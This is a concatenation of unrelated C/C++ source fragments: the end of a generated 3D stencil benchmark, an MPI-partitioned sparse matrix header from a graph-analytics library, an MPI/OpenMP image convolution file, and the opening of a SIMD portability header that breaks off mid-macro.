for (t3=max(max(0,ceild(3*t1-1,2)),ceild(24*t2-Nz-4,8));t3<=min(min(min(floord(Nt+Ny-4,8),floord(12*t1+Ny+21,8)),floord(24*t2+Ny+20,8)),floord(24*t1-24*t2+Nz+Ny+19,8));t3++) {
for (t4=max(max(max(0,ceild(3*t1-7,8)),ceild(24*t2-Nz-28,32)),ceild(8*t3-Ny-28,32));t4<=min(min(min(min(floord(Nt+Nx-4,32),floord(12*t1+Nx+21,32)),floord(24*t2+Nx+20,32)),floord(8*t3+Nx+4,32)),floord(24*t1-24*t2+Nz+Nx+19,32));t4++) {
for (t5=max(max(max(max(max(0,12*t1),24*t1-24*t2+1),24*t2-Nz+2),8*t3-Ny+2),32*t4-Nx+2);t5<=min(min(min(min(min(Nt-2,12*t1+23),24*t2+22),8*t3+6),32*t4+30),24*t1-24*t2+Nz+21);t5++) {
for (t6=max(max(24*t2,t5+1),-24*t1+24*t2+2*t5-23);t6<=min(min(24*t2+23,-24*t1+24*t2+2*t5),t5+Nz-2);t6++) {
for (t7=max(8*t3,t5+1);t7<=min(8*t3+7,t5+Ny-2);t7++) {
lbv=max(32*t4,t5+1);
ubv=min(32*t4+31,t5+Nx-2);
#pragma ivdep
#pragma vector always
for (t8=lbv;t8<=ubv;t8++) {
A[( t5 + 1) % 2][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] = (((((((coef[0][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] * A[ t5 % 2][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)]) + (coef[1][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] * A[ t5 % 2][ (-t5+t6) - 1][ (-t5+t7)][ (-t5+t8)])) + (coef[2][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] * A[ t5 % 2][ (-t5+t6)][ (-t5+t7) - 1][ (-t5+t8)])) + (coef[3][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] * A[ t5 % 2][ (-t5+t6)][ (-t5+t7)][ (-t5+t8) - 1])) + (coef[4][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] * A[ t5 % 2][ (-t5+t6) + 1][ (-t5+t7)][ (-t5+t8)])) + (coef[5][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] * A[ t5 % 2][ (-t5+t6)][ (-t5+t7) + 1][ (-t5+t8)])) + (coef[6][ (-t5+t6)][ (-t5+t7)][ (-t5+t8)] * A[ t5 % 2][ (-t5+t6)][ (-t5+t7)][ (-t5+t8) + 1]));;
}
}
}
}
}
}
}
}
}
/* End of CLooG code */
gettimeofday(&end, 0);
ts_return = timeval_subtract(&result, &end, &start);
tdiff = (double) (result.tv_sec + result.tv_usec * 1.0e-6);
min_tdiff = min(min_tdiff, tdiff);
printf("Rank 0 TEST# %d time: %f\n", test, tdiff);
}
PRINT_RESULTS(1, "variable no-symmetry")
#ifdef LIKWID_PERFMON
#pragma omp parallel
{
LIKWID_MARKER_STOP("calc");
}
LIKWID_MARKER_CLOSE;
#endif
// Free allocated arrays
for(i=0; i<Nz; i++){
for(j=0;j<Ny;j++){
free(A[0][i][j]);
free(A[1][i][j]);
}
free(A[0][i]);
free(A[1][i]);
}
free(A[0]);
free(A[1]);
for(m=0; m<7;m++){
for(i=0; i<Nz; i++){
for(j=0;j<Ny;j++){
free(coef[m][i][j]);
}
free(coef[m][i]);
}
free(coef[m]);
}
return 0;
}
|
SpMat.h | /******************************************************************************
* ** Copyright (c) 2016, Intel Corporation **
* ** All rights reserved. **
* ** **
* ** Redistribution and use in source and binary forms, with or without **
* ** modification, are permitted provided that the following conditions **
* ** are met: **
* ** 1. Redistributions of source code must retain the above copyright **
* ** notice, this list of conditions and the following disclaimer. **
* ** 2. Redistributions in binary form must reproduce the above copyright **
* ** notice, this list of conditions and the following disclaimer in the **
* ** documentation and/or other materials provided with the distribution. **
* ** 3. Neither the name of the copyright holder nor the names of its **
* ** contributors may be used to endorse or promote products derived **
* ** from this software without specific prior written permission. **
* ** **
* ** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS **
* ** "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT **
* ** LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR **
* ** A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT **
* ** HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, **
* ** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED **
* ** TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR **
* ** PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF **
* ** LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING **
* ** NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS **
* ** SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
* * ******************************************************************************/
/* Narayanan Sundaram (Intel Corp.), Michael Anderson (Intel Corp.)
* * ******************************************************************************/
#ifndef SRC_SPMAT_H_
#define SRC_SPMAT_H_
#include <string>
#include <algorithm>
#include "GMDP/utils/binary_search.h"
template <typename T>
bool compare_tile_id(const tedge_t<T>& a, const tedge_t<T>& b) {
if (a.tile_id < b.tile_id)
return true;
return false;
}
template <typename SpTile>
class SpMat {
public:
int ntiles_x;
int ntiles_y;
int m;
int n;
std::vector<std::vector<SpTile*> > tiles;
std::vector<int> start_idx;
std::vector<int> start_idy;
std::vector<int> nodeIds;
friend boost::serialization::access;
template<class Archive>
void serialize(Archive& ar, const unsigned int version) {
ar & ntiles_x;
ar & ntiles_y;
ar & m;
ar & n;
ar & tiles;
ar & start_idx;
ar & start_idy;
ar & nodeIds;
}
inline int getPartition(const int src, const int dst, int* ival, int* jval) const {
(*ival) = -1;
(*jval) = -1;
for (int i = 0; i < ntiles_y; i++) {
if ((src > start_idy[i]) && (src <= start_idy[i + 1])) {
(*ival) = i;
break;
}
}
for (int j = 0; j < ntiles_x; j++) {
if ((dst > start_idx[j]) && (dst <= start_idx[j + 1])) {
(*jval) = j;
break;
}
}
if ((*ival) == -1 || (*jval) == -1) {
printf("%d %d == -1\n", src, dst);
printf("idx: %d %d\n", start_idx[0], start_idx[1]);
printf("idy: %d %d\n", start_idy[0], start_idy[1]);
printf("ntiles_y:%d ntiles_x:%d\n", ntiles_y, ntiles_x);
return -1;
}
return (*ival) + (*jval) * ntiles_y;
}
template <typename T>
void ingestEdgelist(edgelist_t<T>& blob) {
int global_nrank = get_global_nrank();
int global_myrank = get_global_myrank();
int nnz_l = blob.nnz;
edge_t<T>* edge_list = blob.edges;
int m = blob.m;
int n = blob.n;
printf("Rank %d: Before shuffle %d edges\n", global_myrank, blob.nnz);
edge_t<T> * received_edges;
unsigned long int new_nnz = 0;
if(global_nrank == 1)
{
new_nnz = nnz_l;
received_edges = new edge_t<T>[new_nnz];
memcpy(received_edges, edge_list, new_nnz * sizeof(edge_t<T>));
}
else
{
tedge_t<T> * tedges = new tedge_t<T>[nnz_l];
#pragma omp parallel for
for(unsigned long i = 0 ; i < nnz_l ; i++)
{
tedges[i].src = edge_list[i].src;
tedges[i].dst = edge_list[i].dst;
tedges[i].val = edge_list[i].val;
int ival, jval;
int tile_id = getPartition(edge_list[i].src, edge_list[i].dst, &ival, &jval);
assert(tile_id != -1);
tedges[i].tile_id = nodeIds[ival + jval * ntiles_y];
}
__gnu_parallel::sort(tedges, tedges + nnz_l, compare_tile_id<T>);
int * assignment = new int[nnz_l];
#pragma omp parallel for
for(unsigned long i = 0 ; i < nnz_l ; i++)
{
edge_list[i].src = tedges[i].src;
edge_list[i].dst = tedges[i].dst;
edge_list[i].val = tedges[i].val;
assignment[i] = tedges[i].tile_id;
}
delete [] tedges;
unsigned long int * positions = new unsigned long[global_nrank+1];
unsigned long int * counts = new unsigned long[global_nrank];
unsigned long int * recv_positions = new unsigned long[global_nrank+1];
unsigned long int * recv_counts = new unsigned long[global_nrank];
unsigned long int current_count = 0;
for(int i = 0 ; i < global_nrank ; i++)
{
int point = binary_search_right_border(assignment, i, 0, nnz_l, nnz_l);
if(point == -1)
{
counts[i] = 0;
positions[i] = current_count;
}
else
{
counts[i] = (point+1) - current_count;
positions[i] = current_count;
current_count = (point+1);
}
}
positions[global_nrank] = nnz_l;
MPI_Barrier(MPI_COMM_WORLD);
delete [] assignment;
MPI_Request* mpi_req = new MPI_Request[2 * global_nrank];
MPI_Status* mpi_status = new MPI_Status[2 * global_nrank];
for (int i = 0; i < global_nrank; i++) {
MPI_Isend(&counts[i], 1, MPI_UNSIGNED_LONG, i, global_myrank, MPI_COMM_WORLD,
&mpi_req[i]);
}
for (int i = 0; i < global_nrank; i++) {
MPI_Irecv(&recv_counts[i], 1, MPI_UNSIGNED_LONG, i, i, MPI_COMM_WORLD,
&mpi_req[i + global_nrank]);
}
MPI_Waitall(2 * global_nrank, mpi_req, mpi_status);
MPI_Barrier(MPI_COMM_WORLD);
recv_positions[0] = 0;
for(int i = 0 ; i < global_nrank ; i++)
{
new_nnz += recv_counts[i];
recv_positions[i+1] = new_nnz;
}
printf("Rank %d: After shuffle %ld edges\n", global_myrank, new_nnz);
MPI_Datatype MPI_EDGE_T;
MPI_Type_contiguous(sizeof(edge_t<T>), MPI_CHAR, &MPI_EDGE_T);
MPI_Type_commit(&MPI_EDGE_T);
for (int i = 0; i < global_nrank; i++) {
MPI_Isend(edge_list + positions[i], counts[i] ,
MPI_EDGE_T, i, global_myrank, MPI_COMM_WORLD, &mpi_req[i]);
}
received_edges = new edge_t<T>[new_nnz];
for (int i = 0; i < global_nrank; i++) {
MPI_Irecv(received_edges + recv_positions[i], recv_counts[i] ,
MPI_EDGE_T, i, i, MPI_COMM_WORLD, &mpi_req[i+global_nrank]);
}
MPI_Waitall(2 * global_nrank, mpi_req, mpi_status);
MPI_Barrier(MPI_COMM_WORLD);
delete [] mpi_status;
delete [] mpi_req;
delete [] positions;
delete [] counts;
delete [] recv_positions;
delete [] recv_counts;
}
printf("Rank %d: After shuffle %ld edges\n", global_myrank, new_nnz);
tedge_t<T> * tedges2 = new tedge_t<T>[new_nnz];
#pragma omp parallel for
for(unsigned long i = 0 ; i < new_nnz ; i++)
{
tedges2[i].src = received_edges[i].src;
tedges2[i].dst = received_edges[i].dst;
tedges2[i].val = received_edges[i].val;
int ival, jval;
// if(global_nrank == 1)
// tedges2[i].tile_id = 0;
// else
tedges2[i].tile_id = getPartition(received_edges[i].src, received_edges[i].dst, &ival, &jval);
if(tedges2[i].tile_id == -1) {
printf("src:%d dst:%d val:%d\n", tedges2[i].src, tedges2[i].dst, tedges2[i].val);
}
assert(tedges2[i].tile_id != -1);
}
__gnu_parallel::sort(tedges2, tedges2 + new_nnz , compare_tile_id<T>);
int * assignment2 = new int[new_nnz];
#pragma omp parallel for
for(unsigned long i = 0 ; i < new_nnz ; i++)
{
received_edges[i].src = tedges2[i].src;
received_edges[i].dst = tedges2[i].dst;
received_edges[i].val = tedges2[i].val;
assignment2[i] = tedges2[i].tile_id;
}
delete [] tedges2;
for (int tile_j = 0; tile_j < ntiles_x; tile_j++) {
for (int tile_i = 0; tile_i < ntiles_y; tile_i++) {
if (nodeIds[tile_i + tile_j * ntiles_y] == global_myrank) {
int tile_m = start_idy[tile_i + 1] - start_idy[tile_i];
int tile_n = start_idx[tile_j + 1] - start_idx[tile_j];
int this_tile_id = tile_i + tile_j * ntiles_y;
// Find left and right
int start_nz = binary_search_left_border(assignment2, this_tile_id, 0, new_nnz, new_nnz);
int end_nz = binary_search_right_border(assignment2, this_tile_id, 0, new_nnz, new_nnz);
int nnz = 0;
if((start_nz != -1) && (end_nz != -1))
{
nnz = (end_nz+1) - start_nz;
}
if (nnz <= 0) {
tiles[tile_i][tile_j] = new SpTile(tile_m, tile_n);
} else {
tiles[tile_i][tile_j] =
new SpTile(received_edges + start_nz, tile_m, tile_n, nnz, start_idy[tile_i],
start_idx[tile_j]);
}
}
}
}
delete [] assignment2;
delete [] received_edges;
MPI_Barrier(MPI_COMM_WORLD);
}
void Allocate2DPartitioned(int m, int n, int _ntiles_x, int _ntiles_y,
int (*pfn)(int, int, int, int, int)) {
int global_nrank = get_global_nrank();
int global_myrank = get_global_myrank();
ntiles_x = _ntiles_x;
ntiles_y = _ntiles_y;
assert(ntiles_x > 0);
assert(ntiles_y > 0);
this->m = m;
this->n = n;
int vx, vy;
int roundup = 256;
vx = ((((n + ntiles_x - 1) / ntiles_x) + roundup - 1) / roundup) * roundup;
vy = ((((m + ntiles_y - 1) / ntiles_y) + roundup - 1) / roundup) * roundup;
for (int j = 0; j < ntiles_x; j++) {
for (int i = 0; i < ntiles_y; i++) {
nodeIds.push_back(pfn(j, i, ntiles_x, ntiles_y, global_nrank));
}
}
for (int j = 0; j < ntiles_x; j++) {
start_idx.push_back(std::min(vx * j, n));
}
for (int i = 0; i < ntiles_y; i++) {
start_idy.push_back(std::min(vy * i, m));
}
start_idx.push_back(n);
start_idy.push_back(m);
// Allocate space for tiles
for (int tile_i = 0; tile_i < ntiles_y; tile_i++) {
std::vector<SpTile*> tmp;
for (int tile_j = 0; tile_j < ntiles_x; tile_j++) {
tmp.push_back((SpTile*)NULL);
}
tiles.push_back(tmp);
}
}
SpMat() {}
template <typename T>
SpMat(edgelist_t<T> edgelist, int ntx,
int nty, int (*pfn)(int, int, int, int, int)) {
Allocate2DPartitioned(edgelist.m, edgelist.n, ntx, nty, pfn);
ingestEdgelist(edgelist);
}
~SpMat()
{
for(auto it1 = tiles.begin() ; it1 != tiles.end() ; it1++)
{
for(auto it2 = it1->begin() ; it2 != it1->end() ; it2++)
{
delete *it2;
}
}
}
template <typename T>
void get_edges(edgelist_t<T>* edgelist) const {
int global_nrank = get_global_nrank();
int global_myrank = get_global_myrank();
// Get nnz
int nnzs = 0;
for (int i = 0; i < ntiles_y; i++) {
for (int j = 0; j < ntiles_x; j++) {
if (nodeIds[i + j * ntiles_y] == global_myrank) {
nnzs += tiles[i][j]->nnz;
}
}
}
edgelist->m = m;
edgelist->n = n;
edgelist->nnz = nnzs;
if(nnzs > 0)
{
edgelist->edges = reinterpret_cast<edge_t<T>*>(
_mm_malloc((uint64_t)nnzs * (uint64_t)sizeof(edge_t<T>), 64));
nnzs = 0;
for (int i = 0; i < ntiles_y; i++) {
for (int j = 0; j < ntiles_x; j++) {
if (nodeIds[i + j * ntiles_y] == global_myrank) {
tiles[i][j]
->get_edges(edgelist->edges + nnzs, start_idy[i], start_idx[j]);
nnzs += tiles[i][j]->nnz;
}
}
}
}
}
uint64_t getNNZ()
{
int global_myrank = get_global_myrank();
uint64_t total_nnz = 0;
for(int i = 0 ; i < ntiles_y ; i++)
{
for(int j = 0 ; j < ntiles_x ; j++)
{
if(nodeIds[i + j * ntiles_y] == global_myrank)
{
total_nnz += tiles[i][j]->nnz;
}
}
}
// global reduction
MPI_Allreduce(MPI_IN_PLACE, &total_nnz, 1, MPI_INT, MPI_SUM, MPI_COMM_WORLD);
return total_nnz;
}
};
template <template <typename> class SpTile, typename T>
void get_row_ranks(const SpMat<SpTile<T> >* mat,
std::vector<std::set<int> >* row_ranks_out,
std::vector<std::set<int> >* col_ranks_out) {
for (int i = 0; i < mat->ntiles_y; i++) {
// Create set of row nodeIDs
std::set<int> row_ranks;
for (int j = 0; j < mat->ntiles_x; j++) {
row_ranks.insert(mat->nodeIds[i + j * mat->ntiles_y]);
}
row_ranks_out->push_back(row_ranks);
}
for (int j = 0; j < mat->ntiles_x; j++) {
// Create set of col nodeIDs
std::set<int> col_ranks;
for (int i = 0; i < mat->ntiles_y; i++) {
col_ranks.insert(mat->nodeIds[i + j * mat->ntiles_y]);
}
col_ranks_out->push_back(col_ranks);
}
}
template <template <typename> class SpTile, typename T>
void Transpose(const SpMat<SpTile<T> >* mat, SpMat<SpTile<T> >** matc, int ntx,
int nty, int (*pfn)(int, int, int, int, int)) {
edgelist_t<T> edgelist;
mat->get_edges(&edgelist);
#pragma omp parallel for
for (int i = 0; i < edgelist.nnz; i++) {
int tmp = edgelist.edges[i].src;
edgelist.edges[i].src = edgelist.edges[i].dst;
edgelist.edges[i].dst = tmp;
}
int tmp = edgelist.m;
edgelist.m = edgelist.n;
edgelist.n = tmp;
(*matc) = new SpMat<SpTile<T> >(edgelist, ntx, nty, pfn);
if(edgelist.nnz > 0)
{
_mm_free(edgelist.edges);
}
}
#endif // SRC_SPMAT_H_
|
mpi_omp_functions.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <limits.h>
#include <mpi.h>
#include <omp.h>
#include "mpi_omp_functions.h"
/* Read command line arguments from user and store them to a struct */
void ParseInput(int argc, char **argv, inputArguments *input) {
int i;
if (argc == 11) {
for (i = 1 ; i < argc ; i++) {
if (!strcmp(argv[i], "-i")) { // If flag is -i ..
strcpy(input->imageNameInput, argv[++i]);
sprintf(input->imageNameOutput, "Filtered_%s", argv[i]);
continue;
}
if (!strcmp(argv[i], "-h")) { // If flag is -h ..
input->height = atoi(argv[++i]);
continue;
}
if (!strcmp(argv[i], "-w")) { // If flag is -w ..
input->width = atoi(argv[++i]);
continue;
}
if (!strcmp(argv[i], "-l")) { // If flag is -l ..
input->iterations = atoi(argv[++i]);
continue;
}
if (!strcmp(argv[i], "-t")) { // If flag is -t ..
if (!strcmp(argv[++i], "GREY"))
input->imageType = GREY;
else if (!strcmp(argv[i], "RGB"))
input->imageType = RGB;
else {
fprintf(stderr, "Input error: wrong image type\n");
MPI_Abort(MPI_COMM_WORLD, EXIT_FAILURE);
exit(EXIT_FAILURE);
}
continue;
}
}
}
else {
fprintf(stderr, "Input error: wrong number of command line arguments\n");
MPI_Abort(MPI_COMM_WORLD, EXIT_FAILURE);
exit(EXIT_FAILURE);
}
}
/* Find a proper image split to balance load calculations on each process */
void splitImageToBlocks(int height, int width, int numProcesses, int *splitRows, int *splitCols) {
int rowNumber, colNumber, blockSize, blockSizeMin = INT_MAX;
for (rowNumber = 1 ; rowNumber <= numProcesses ; rowNumber++) {
if ((height%rowNumber == 0) && (numProcesses%rowNumber == 0))
colNumber = numProcesses / rowNumber;
else
continue;
if (width%colNumber == 0)
blockSize = height/rowNumber + width/colNumber;
else
continue;
if (blockSize < blockSizeMin) {
blockSizeMin = blockSize;
*splitRows = rowNumber;
*splitCols = colNumber;
}
}
}
void convoluteGREY(uint8_t *source, uint8_t *destination, float **filter, int width, int rowStart, int colStart, int rowEnd, int colEnd) {
int i, j;
float sum;
#pragma omp parallel for shared(source, destination) schedule(static) collapse(2)
for (i = rowStart ; i <= rowEnd ; i++) {
for (j = colStart ; j <= colEnd ; j++) {
innerConvoluteGREY(source, destination, filter, width, i, j);
}
}
}
void innerConvoluteGREY(uint8_t *source, uint8_t *destination, float **filter, int width, int i, int j) {
int x, y, sum = 0;
for (x = (i-1) ; x <= (i+1) ; x++) {
for (y = (j-1) ; y <= (j+1) ; y++) {
sum += source[x*width + y] * filter[x-(i-1)][y-(j-1)];
}
}
destination[i*width + j] = sum;
}
/* Apply filter through convolution on RGB images */
void convoluteRGB(uint8_t *source, uint8_t *destination, float **filter, int width, int rowStart, int colStart, int rowEnd, int colEnd) {
int i, j, x, y;
float sumR, sumG, sumB;
#pragma omp parallel for shared(source, destination) schedule(static) collapse(2)
for (i = rowStart ; i <= rowEnd ; i++) {
for (j = colStart ; j <= colEnd ; j++) {
innerConvoluteRGB(source, destination, filter, width, i, j);
}
}
}
void innerConvoluteRGB(uint8_t *source, uint8_t *destination, float **filter, int width, int i, int j) {
int x, y, sumR = 0, sumG = 0, sumB = 0;
for (x = (i-1) ; x <= (i+1) ; x++) {
for (y = (3*(j-1)) ; y <= (3*(j+1)) ; y+=3) {
sumR += source[x*width + y] * filter[x-(i-1)][(y-(3*(j-1)))/3];
sumG += source[x*width + y+1] * filter[x-(i-1)][(y-(3*(j-1)))/3];
sumB += source[x*width + y+2] * filter[x-(i-1)][(y-(3*(j-1)))/3];
}
}
destination[i*width + 3*j] = sumR;
destination[i*width + 3*j+1] = sumG;
destination[i*width + 3*j+2] = sumB;
}
|
sse.h | /* SPDX-License-Identifier: MIT
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*
* Copyright:
* 2017-2020 Evan Nemerson <evan@nemerson.com>
* 2015-2017 John W. Ratcliff <jratcliffscarab@gmail.com>
* 2015 Brandon Rowlett <browlett@nvidia.com>
* 2015 Ken Fast <kfast@gdeb.com>
*/
#if !defined(SIMDE_X86_SSE_H)
#define SIMDE_X86_SSE_H
#include "mmx.h"
#if defined(_WIN32)
#include <windows.h>
#endif
HEDLEY_DIAGNOSTIC_PUSH
SIMDE_DISABLE_UNWANTED_DIAGNOSTICS
SIMDE_BEGIN_DECLS_
typedef union {
#if defined(SIMDE_VECTOR_SUBSCRIPT)
SIMDE_ALIGN_TO_16 int8_t i8 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int16_t i16 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int32_t i32 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int64_t i64 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint8_t u8 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint16_t u16 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint32_t u32 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint64_t u64 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#if defined(SIMDE_HAVE_INT128_)
SIMDE_ALIGN_TO_16 simde_int128 i128 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 simde_uint128 u128 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#endif
SIMDE_ALIGN_TO_16 simde_float32 f32 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int_fast32_t i32f SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint_fast32_t u32f SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#else
SIMDE_ALIGN_TO_16 int8_t i8[16];
SIMDE_ALIGN_TO_16 int16_t i16[8];
SIMDE_ALIGN_TO_16 int32_t i32[4];
SIMDE_ALIGN_TO_16 int64_t i64[2];
SIMDE_ALIGN_TO_16 uint8_t u8[16];
SIMDE_ALIGN_TO_16 uint16_t u16[8];
SIMDE_ALIGN_TO_16 uint32_t u32[4];
SIMDE_ALIGN_TO_16 uint64_t u64[2];
#if defined(SIMDE_HAVE_INT128_)
SIMDE_ALIGN_TO_16 simde_int128 i128[1];
SIMDE_ALIGN_TO_16 simde_uint128 u128[1];
#endif
SIMDE_ALIGN_TO_16 simde_float32 f32[4];
SIMDE_ALIGN_TO_16 int_fast32_t i32f[16 / sizeof(int_fast32_t)];
SIMDE_ALIGN_TO_16 uint_fast32_t u32f[16 / sizeof(uint_fast32_t)];
#endif
SIMDE_ALIGN_TO_16 simde__m64_private m64_private[2];
SIMDE_ALIGN_TO_16 simde__m64 m64[2];
#if defined(SIMDE_X86_SSE_NATIVE)
SIMDE_ALIGN_TO_16 __m128 n;
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
SIMDE_ALIGN_TO_16 int8x16_t neon_i8;
SIMDE_ALIGN_TO_16 int16x8_t neon_i16;
SIMDE_ALIGN_TO_16 int32x4_t neon_i32;
SIMDE_ALIGN_TO_16 int64x2_t neon_i64;
SIMDE_ALIGN_TO_16 uint8x16_t neon_u8;
SIMDE_ALIGN_TO_16 uint16x8_t neon_u16;
SIMDE_ALIGN_TO_16 uint32x4_t neon_u32;
SIMDE_ALIGN_TO_16 uint64x2_t neon_u64;
SIMDE_ALIGN_TO_16 float32x4_t neon_f32;
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
SIMDE_ALIGN_TO_16 float64x2_t neon_f64;
#endif
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
SIMDE_ALIGN_TO_16 v128_t wasm_v128;
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(unsigned char) altivec_u8;
SIMDE_ALIGN_TO_16
SIMDE_POWER_ALTIVEC_VECTOR(unsigned short) altivec_u16;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(unsigned int) altivec_u32;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(signed char) altivec_i8;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(signed short) altivec_i16;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(signed int) altivec_i32;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(float) altivec_f32;
#if defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
SIMDE_ALIGN_TO_16
SIMDE_POWER_ALTIVEC_VECTOR(unsigned long long) altivec_u64;
SIMDE_ALIGN_TO_16
SIMDE_POWER_ALTIVEC_VECTOR(signed long long) altivec_i64;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(double) altivec_f64;
#endif
#endif
} simde__m128_private;
#if defined(SIMDE_X86_SSE_NATIVE)
typedef __m128 simde__m128;
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
typedef float32x4_t simde__m128;
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
typedef v128_t simde__m128;
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
typedef SIMDE_POWER_ALTIVEC_VECTOR(float) simde__m128;
#elif defined(SIMDE_VECTOR_SUBSCRIPT)
typedef simde_float32
simde__m128 SIMDE_ALIGN_TO_16 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#else
typedef simde__m128_private simde__m128;
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
typedef simde__m128 __m128;
#endif
HEDLEY_STATIC_ASSERT(16 == sizeof(simde__m128), "simde__m128 size incorrect");
HEDLEY_STATIC_ASSERT(16 == sizeof(simde__m128_private),
"simde__m128_private size incorrect");
#if defined(SIMDE_CHECK_ALIGNMENT) && defined(SIMDE_ALIGN_OF)
HEDLEY_STATIC_ASSERT(SIMDE_ALIGN_OF(simde__m128) == 16,
"simde__m128 is not 16-byte aligned");
HEDLEY_STATIC_ASSERT(SIMDE_ALIGN_OF(simde__m128_private) == 16,
"simde__m128_private is not 16-byte aligned");
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde__m128_from_private(simde__m128_private v)
{
simde__m128 r;
simde_memcpy(&r, &v, sizeof(r));
return r;
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128_private simde__m128_to_private(simde__m128 v)
{
simde__m128_private r;
simde_memcpy(&r, &v, sizeof(r));
return r;
}
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int8x16_t, neon, i8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int16x8_t, neon, i16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int32x4_t, neon, i32)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int64x2_t, neon, i64)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint8x16_t, neon, u8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint16x8_t, neon, u16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint32x4_t, neon, u32)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint64x2_t, neon, u64)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, float32x4_t, neon, f32)
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, float64x2_t, neon, f64)
#endif
#endif /* defined(SIMDE_ARM_NEON_A32V7_NATIVE) */
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
SIMDE_POWER_ALTIVEC_VECTOR(signed char),
altivec, i8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
